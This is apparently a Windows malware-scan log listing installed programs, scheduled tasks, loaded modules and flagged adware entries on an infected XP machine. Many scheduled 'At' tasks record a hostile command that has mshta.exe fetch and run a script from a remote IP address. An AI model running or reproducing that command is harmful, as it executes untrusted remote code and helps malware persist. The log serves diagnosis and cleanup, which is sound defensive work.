Dropbox (HKCU\...\Dropbox) (Version: 2.4.11 - Dropbox, Inc.)
DVD to VCD AVI DivX Converter v3.2 (build 069) (HKLM\...\DVD to VCD AVI DivX Converter v3.2 (build 069)) (Version:  - )
eMachines Games (HKLM\...\WildTangent emachines Master Uninstall) (Version: 1.0.0.52 - WildTangent)
eMachines Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3005 - Acer Incorporated)
FFmpeg 2009-01-08 for Audacity (HKLM\...\FFmpeg for Audacity_is1) (Version:  - )
FFmpeg for Audacity on Windows (HKLM\...\FFmpeg for Audacity on Windows_is1) (Version:  - )
FLV Player 2.0 (build 25) (HKLM\...\FLV Player) (Version: 2.0 (build 25) - Martijn de Visser)
Free FTP (HKLM\...\freeftp) (Version:  - )
Free Ride Games Player (HKLM\...\{2B7BDADB-EC8C-4C54-B5DD-CE45A016D3A7}) (Version:  - )
Freecorder (HKLM\...\Freecorder4.1) (Version: 4.1 - Applian Technologies Inc.)
GIMP 2.6.10 (HKLM\...\WinGimp-2.0_is1) (Version: 2.6.10 - The GIMP Team)
Google Chrome (HKLM\...\Google Chrome) (Version: 31.0.1650.63 - Google Inc.)
Google Desktop (HKLM\...\Google Desktop) (Version: 5.8.0809.23506 - Google)
Google Earth Plug-in (HKLM\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (Version: 1.3.22.3 - Google Inc.) Hidden
ieSpell (HKLM\...\ieSpell) (Version: 2.6.4 (build 573) - Red Egg Software)
Java Auto Updater (Version: 2.0.7.2 - Sun Microsystems, Inc.) Hidden
Java 6 Update 37 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216035FF}) (Version: 6.0.370 - Oracle)
Jokosher version 0.11.4 (HKLM\...\Jokosher_is1) (Version:  - )
Junk Mail filter update (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
LAME v3.98.2 for Audacity (HKLM\...\LAME for Audacity_is1) (Version:  - )
Magic Encyclopedia (HKLM\...\exent_605350) (Version:  - )
Malwarebytes Anti-Malware version 1.75.0.1300 (HKLM\...\Malwarebytes' Anti-Malware_is1) (Version: 1.75.0.1300 - Malwarebytes Corporation)
Microsoft .NET Framework 1.1 (HKLM\...\Microsoft .NET Framework 1.1  (1033)) (Version:  - )
Microsoft .NET Framework 1.1 (Version: 1.1.4322 - Microsoft) Hidden
Microsoft .NET Framework 1.1 Security Update (KB2698023) (HKLM\...\M2698023) (Version:  - )
Microsoft .NET Framework 1.1 Security Update (KB2833941) (HKLM\...\M2833941) (Version:  - )
Microsoft .NET Framework 2.0 Service Pack 2 (HKLM\...\{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}) (Version: 2.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.0 Service Pack 2 (HKLM\...\{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}) (Version: 3.2.30729 - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (Version: 3.5.30729 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden
Microsoft Base Smart Card Cryptographic Service Provider Package (HKLM\...\KB909520) (Version:  - Microsoft Corporation)
Microsoft Compression Client Pack 1.0 for Windows XP (HKLM\...\MSCompPackV1) (Version: 1 - Microsoft Corporation)
Microsoft Internationalized Domain Names Mitigation APIs (Version:  - Microsoft Corporation) Hidden
Microsoft National Language Support Downlevel APIs (Version:  - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Proof (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 4.4.0304.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.4.304.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
Microsoft Software Update for Web Folders  (English) 12 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Text-to-Speech Engine 4.0 (English) (HKLM\...\MSTTS) (Version:  - )
Microsoft User-Mode Driver Framework Feature Pack 1.0 (HKLM\...\Wudf01000) (Version:  - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM\...\{527BBE2F-1FED-3D8B-91CB-4DB0F838E69E}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Works (HKLM\...\{67E03279-F703-408F-B4BF-46B5FC8D70CD}) (Version: 9.7.0621 - Microsoft Corporation)
Mozilla Firefox 27.0.1 (x86 en-US) (HKLM\...\Mozilla Firefox 27.0.1 (x86 en-US)) (Version: 27.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 27.0.1 - Mozilla)
MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden
Norton Security Scan (HKLM\...\NSS) (Version: 2.3.0.44 - Symantec Corporation)
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version:  - )
Optimizer Pro v3.2 (HKLM\...\Optimizer Pro_is1) (Version:  - PC Utilities Software Limited) <==== ATTENTION
RealPlayer (HKLM\...\RealPlayer 12.0) (Version:  - RealNetworks)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 5.10.0.5628 - Realtek Semiconductor Corp.)
RealUpgrade 1.0 (Version: 1.0.0 - RealNetworks, Inc.) Hidden
Re-Markable (HKLM\...\3ab10bee-8869-4359-a475-bb66899cdbdc) (Version:  - ReMarkable) <==== ATTENTION
Segoe UI (Version: 14.0.4327.805 - Microsoft Corp) Hidden
Spell Checker For OE 2.1 (HKLM\...\Spell Checker For OE 2.1) (Version:  - )
The Treasures of Montezuma (HKLM\...\exent_466550) (Version:  - )
Ulead GIF Animator 5 TBYB (HKLM\...\{8AF3E926-ED59-11D4-A44B-0000E86D2305}) (Version:  - Ulead System)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2473228) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2473228) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2468871) (HKLM\...\{0A0CADCF-78DA-33C4-A350-CD51849B9702}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Extended (KB2533523) (HKLM\...\{0A0CADCF-78DA-33C4-A350-CD51849B9702}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_HOMESTUDENTR_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{A024FC7B-77DE-45DE-A058-1C049A17BFB3}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{CB68A5B0-3508-4193-AEB9-AF636DAECE0F}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0409-0000-0000000FF1CE}_HOMESTUDENTR_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM\...\{90120000-00A1-0409-0000-0000000FF1CE}_HOMESTUDENTR_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0409-0000-0000000FF1CE}_HOMESTUDENTR_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_HOMESTUDENTR_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0409-0000-0000000FF1CE}_HOMESTUDENTR_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
Update for Windows Internet Explorer 8 (KB2598845) (HKLM\...\KB2598845-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 8 (KB973874) (HKLM\...\KB973874-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 8 (KB976662) (HKLM\...\KB976662-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 8 (KB980182) (HKLM\...\KB980182-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2141007) (HKLM\...\KB2141007) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2345886) (HKLM\...\KB2345886) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2467659) (HKLM\...\KB2467659) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2492386) (HKLM\...\KB2492386) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2541763) (HKLM\...\KB2541763) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2616676-v2) (HKLM\...\KB2616676-v2) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB2641690) (HKLM\...\KB2641690) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2661254-v2) (HKLM\...\KB2661254-v2) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB2718704) (HKLM\...\KB2718704) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2736233) (HKLM\...\KB2736233) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2749655) (HKLM\...\KB2749655) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2863058) (HKLM\...\KB2863058) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2904266) (HKLM\...\KB2904266) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB898461) (HKLM\...\KB898461) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB951978) (Version: 1 - Microsoft Corporation) Hidden
Update for Windows XP (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB955839) (HKLM\...\KB955839) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB967715) (HKLM\...\KB967715) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971737) (HKLM\...\KB971737) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973687) (HKLM\...\KB973687) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
VC 9.0 Runtime (Version: 1.0.0 - Check Point Software Technologies Ltd) Hidden
Virtual Villagers 2 (HKLM\...\exent_629350) (Version:  - )
VLC media player 2.1.3 (HKLM\...\VLC media player) (Version: 2.1.3 - VideoLAN)
WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
Windows Defender (HKLM\...\{A06275F4-324B-4E85-95E6-87B2CD729401}) (Version: 1.1.1593.21 - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\KB892130) (Version:  - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\WGA) (Version: 1.7.0069.2 - Microsoft Corporation)
Windows Internet Explorer 7 (Version: 20070813.185237 - Microsoft Corporation) Hidden
Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140743 - Microsoft Corporation)
Windows Live Call (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Windows Live Communications Platform (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Essentials (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Windows Live Mail (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Windows Live Messenger (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (Version: 14.0.8051.1204 - Microsoft Corporation) Hidden
Windows Live Sign-in Assistant (HKLM\...\{9422C8EA-B0C6-4197-B8FC-DC797658CA00}) (Version: 5.000.818.6 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{FDD810CA-D5E3-40E9-AB7B-36440B0D41EF}) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Live Writer (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Windows Management Framework Core (HKLM\...\KB968930) (Version:  - Microsoft Corporation)
Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version:  - )
Windows Media Format 11 runtime (Version:  - Microsoft Corporation) Hidden
Windows Media Player 11 (HKLM\...\Windows Media Player) (Version:  - )
Windows Media Player 11 (Version:  - Microsoft Corporation) Hidden
WinPcap 4.1.3 (HKLM\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
XP Codec Pack (HKLM\...\XP Codec Pack) (Version:  - )
Yahoo! Messenger (HKLM\...\Yahoo! Messenger) (Version:  - Yahoo! Inc.)
YASA Audio/Data/Video CD Burner v4.3.90 (HKLM\...\YASA Audio/Data/Video CD Burner v4.3.90) (Version:  - )
Yontoo Layers Runtime 1.10.01 (HKLM\...\{889DF117-14D1-44EE-9F31-C5FB5D47F68B}) (Version: 1.10.01 - Yontoo LLC) <==== ATTENTION
Zip Opener Packages (HKCU\...\Zip Opener Packages) (Version:  - ) <==== ATTENTION

==================== Restore Points  =========================

19-03-2014 14:48:42 System Checkpoint
20-03-2014 13:05:41 Software Distribution Service 3.0

==================== Hosts content: ==========================

2009-03-13 11:15 - 2008-04-14 08:00 - 00000734 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\At1.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At10.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At11.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At12.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At13.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At14.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At15.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At16.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At17.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At18.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At19.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At2.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At20.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At21.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At22.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At23.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At24.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At25.job => C:\DOCUME~1\BUDDYH~1\APPLIC~1\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: C:\WINDOWS\Tasks\At26.job => C:\DOCUME~1\BUDDYH~1\APPLIC~1\DIGITA~2\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: C:\WINDOWS\Tasks\At27.job => C:\DOCUME~1\NETWOR~1\APPLIC~1\DIGITA~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: C:\WINDOWS\Tasks\At3.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At4.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At5.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At6.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At7.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At8.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\At9.job => mshta.exe http://91.188.59.15/77t.php?olala=4910202039355412 [strings recovered from binary .job data; also present: SYSTEM, "Created by NetScheduleJobAdd"]
Task: C:\WINDOWS\Tasks\COMODO System Cleaner Update.job => C:\Program Files\COMODO\COMODO System-Cleaner\UpdateApplications.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Microsoft Antimalware Scheduled Scan.job => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: C:\WINDOWS\Tasks\Norton Security Scan for Buddy Harris.job => C:\Program Files\Norton Security Scan\Engine\2.3.0.44\Nss.exe
Task: C:\WINDOWS\Tasks\Re-Markable_wd.job => C:\Program Files\Re-Markable\Re-Markable_wd.exe
Task: C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-18.job => C:\Program Files\Real\RealUpgrade\realupgrade.exe
Task: C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-18.job => C:\Program Files\Real\RealUpgrade\realupgrade.exe
Task: C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-608057341-2165517387-3308722516-1005.job => C:\Program Files\Real\RealUpgrade\realupgrade.exe
Task: C:\WINDOWS\Tasks\User_Feed_Synchronization-{042C18C8-CDF0-49EE-A260-F2CEEBFEDE6A}.job => C:\WINDOWS\system32\msfeedssync.exe

==================== Loaded Modules (whitelisted) =============

2009-03-13 11:16 - 2008-02-25 00:29 - 00466944 _____ () C:\WINDOWS\system32\nvshell.dll
2010-03-22 12:27 - 2010-03-22 12:27 - 00040960 _____ () C:\Documents and Settings\All Users\Application Data\Real\RealPlayer\BrowserRecordPlugin\Chrome\Hook\rpchromebrowserrecordhelper.dll
2014-02-23 10:05 - 2014-02-23 10:05 - 00093184 _____ () C:\Program Files\Re-Markable\Re-Markable_wd.exe
2013-12-15 18:50 - 2013-10-29 15:08 - 04074824 _____ () C:\Program Files\Optimizer Pro\OptProCrash.dll
2013-12-15 18:50 - 2013-12-15 18:50 - 00190616 _____ () C:\Program Files\Optimizer Pro\OptProCrashSvc.dll
2009-03-13 11:56 - 2007-05-13 23:54 - 00264424 ____N () C:\Program Files\CyberLink\Shared files\RichVideo.exe
2011-03-09 15:21 - 2011-03-09 15:21 - 00619816 _____ () C:\Program Files\CyberLink\Power2Go\CLMediaLibrary.dll
2011-03-09 15:21 - 2011-03-09 15:21 - 00013096 _____ () C:\Program Files\CyberLink\Power2Go\CLMLSvcPS.dll
2009-03-13 11:15 - 2008-04-14 08:00 - 00059904 _____ () C:\WINDOWS\system32\devenum.dll
2009-03-13 11:15 - 2008-04-14 08:00 - 00014336 _____ () C:\WINDOWS\system32\msdmo.dll
2013-10-18 19:55 - 2013-10-18 19:55 - 25100288 _____ () C:\Documents and Settings\Buddy Harris\Application Data\Dropbox\bin\libcef.dll
2009-07-14 18:03 - 2000-08-31 07:00 - 00332800 _____ () C:\Program Files\Jasc Software Inc\Paint Shop Pro 7\Fpxlib.dll
2009-07-14 18:03 - 2000-08-31 07:00 - 00122880 _____ () C:\Program Files\Jasc Software Inc\Paint Shop Pro 7\JPEGLib.dll
2014-02-14 08:18 - 2014-02-14 08:19 - 03578992 _____ () C:\Program Files\Mozilla Firefox\mozjs.dll
2009-03-13 11:15 - 2013-01-02 02:49 - 01292288 _____ () C:\WINDOWS\system32\quartz.dll
2014-03-12 09:24 - 2014-03-12 09:24 - 16276872 _____ () C:\WINDOWS\system32\Macromed\Flash\NPSWF32_12_0_0_77.dll
2014-02-23 10:05 - 2014-02-23 10:05 - 00181248 _____ () C:\Program Files\Re-Markable\Re-Markable154.exe

==================== Alternate Data Streams (whitelisted) =========

AlternateDataStreams: C:\Documents and Settings\All Users\Application Data\Temp:A8ADE5D8
AlternateDataStreams: C:\Documents and Settings\All Users\Application Data\Temp:DFC5A2B2

==================== Safe Mode (whitelisted) ===================

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\42233895.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\42233895.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vsmon => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{1a3e09be-1e45-494b-9174-d7385b45bbf5} => ""=""

==================== Disabled items from MSCONFIG ==============

MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
MSCONFIG\startupreg: Babylon Client => C:\Program Files\Babylon\Babylon-Pro\Babylon.exe -AutoStart
MSCONFIG\startupreg: Freecorder FLV Service => "C:\Program Files\Freecorder\FLVSrvc.exe" /run
MSCONFIG\startupreg: swg => "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
MSCONFIG\startupreg: TkBellExe => "C:\Program Files\Common Files\Real\Update_OB\realsched.exe"  -osboot

==================== Faulty Device Manager Devices =============

Name: PS/2 Compatible Mouse
Description: PS/2 Compatible Mouse
